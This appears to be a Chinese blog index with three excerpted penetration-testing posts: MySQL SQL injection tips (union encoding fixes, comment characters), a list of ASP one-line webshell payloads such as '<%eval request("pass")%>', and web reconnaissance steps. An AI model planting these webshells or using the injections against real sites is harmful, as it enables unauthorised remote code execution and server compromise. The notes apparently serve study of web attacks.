摘要:
注入总结 参考链接 MYSQL 有时使用union注入时,会出现一些乱码,如下解决 convert(@@version using latin1) unhex(hex(@@version)) 注释符 井号(#) 双横线 (-- )后面要加一个空格 /**/ 局部注释 %00 直接截断字符串 `反引号 阅读全文
摘要:
一句话木马 asp <%execute(request("kxc"))%> <%eval request ("pass")%> <%eval request(chr(35))%> <%executerequest("YouPass")%> <%eval(request(“1″)):response. 阅读全文
摘要:
信息收集 1.IP信息 17CE 看是否存在cdn 存在的话,查找真实ip 从国外去访问,查看ip信息 去掉www,然后查看ip信息 2.旁站信息 webscan.cc 站长之家 3.C段信息 webscan.cc 站长之家 4.子域名信息 layer子域名挖掘机 subdomain 5.端口信息 阅读全文